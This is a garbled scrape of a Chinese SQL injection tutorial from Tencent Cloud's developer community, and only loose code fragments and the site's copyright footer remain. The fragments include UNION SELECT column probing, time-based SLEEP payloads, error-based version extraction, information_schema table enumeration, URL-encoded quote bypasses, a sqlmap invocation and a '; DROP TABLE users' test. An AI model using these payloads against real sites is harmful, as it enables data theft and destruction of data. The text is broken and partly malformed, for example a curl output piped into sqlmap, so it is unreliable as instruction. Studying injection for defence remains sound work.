127.0.0.1:8080
(Burp 默认端口)。'
或特殊字符(如"
, ;--
),观察响应:MySQL server version
),可能存在注入。' UNION SELECT 1,2,3--+
)。UNION SELECT
列数,直到响应正常:http
http://example.com?id=1 UNION SELECT 1,2,3--+
2
、3
),说明存在注入。id=1
),点击 **Add §** 标记 payload 位置。IF(1=1, SLEEP(5), 0)
。http://example.com?id=1 AND 1=CAST((SELECT version()) AS NCHAR(100))
5.7.38
),说明注入成功。root@localhost
(当前用户)、test_db
(数据库名)。1 UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema='test_db' LIMIT 0,1--+
--sqlmap
参数:bash
curl 'http://example.com?id=1' -H "Cookie: session=123" | sqlmap -r - --dbs%2527
代替'
)。id=1%27%20UNION%20SELECT%201,2,3--+
。; DROP TABLE users--+
等语句,观察是否执行成功(需谨慎操作!)。原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
扫码关注腾讯云开发者
领取腾讯云代金券
Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号 | 京公网安备号11010802020287
Copyright © 2013 - 2025 Tencent Cloud.
All Rights Reserved. 腾讯云 版权所有